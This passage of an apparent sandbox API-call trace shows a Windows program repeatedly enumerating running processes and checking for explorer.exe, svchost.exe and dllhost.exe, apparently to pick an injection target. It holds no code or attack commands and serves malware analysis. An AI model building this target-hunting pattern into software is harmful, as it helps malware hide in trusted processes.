(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0173.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0173.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0173.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0173.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0173.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0173.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0173.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.547] CloseHandle (hObject=0xd8) returned 1 [0173.547] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0173.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0173.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.548] CloseHandle (hObject=0xd8) returned 1 [0173.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0173.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0173.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0173.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0173.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0173.549] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.549] CloseHandle (hObject=0xd8) returned 1 [0173.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0173.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.550] CloseHandle (hObject=0xd8) returned 1 [0173.550] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0173.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0173.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.550] CloseHandle (hObject=0xd8) returned 1 [0173.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0173.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0173.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.552] CloseHandle (hObject=0xd8) returned 1 [0173.552] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0173.552] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0173.552] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0173.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0173.552] CloseHandle (hObject=0xd4) returned 1 [0173.552] Sleep (dwMilliseconds=0x3e8) [0174.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0174.659] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0174.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0174.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0174.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0174.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0174.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0174.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0174.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0174.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0174.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0174.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0174.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0174.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0174.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0174.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0174.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0174.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0174.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0174.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0174.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0174.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.669] CloseHandle (hObject=0xd8) returned 1 [0174.669] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0174.669] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0174.669] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0174.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0174.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0174.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.670] CloseHandle (hObject=0xd8) returned 1 [0174.670] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0174.670] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0174.670] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0174.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0174.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0174.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0174.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0174.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.671] CloseHandle (hObject=0xd8) returned 1 [0174.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0174.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0174.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.672] CloseHandle (hObject=0xd8) returned 1 [0174.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0174.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0174.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.673] CloseHandle (hObject=0xd8) returned 1 [0174.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0174.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0174.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.673] CloseHandle (hObject=0xd8) returned 1 [0174.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0174.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0174.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.674] CloseHandle (hObject=0xd8) returned 1 [0174.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0174.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0174.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.674] CloseHandle (hObject=0xd8) returned 1 [0174.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0174.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0174.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.675] CloseHandle (hObject=0xd8) returned 1 [0174.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0174.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0174.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.676] CloseHandle (hObject=0xd8) returned 1 [0174.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0174.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0174.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.676] CloseHandle (hObject=0xd8) returned 1 [0174.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0174.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0174.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.677] CloseHandle (hObject=0xd8) returned 1 [0174.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0174.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0174.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.677] CloseHandle (hObject=0xd8) returned 1 [0174.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0174.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0174.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.678] CloseHandle (hObject=0xd8) returned 1 [0174.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0174.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0174.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.679] CloseHandle (hObject=0xd8) returned 1 [0174.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0174.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0174.679] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.679] CloseHandle (hObject=0xd8) returned 1 [0174.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0174.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0174.680] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.680] CloseHandle (hObject=0xd8) returned 1 [0174.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, 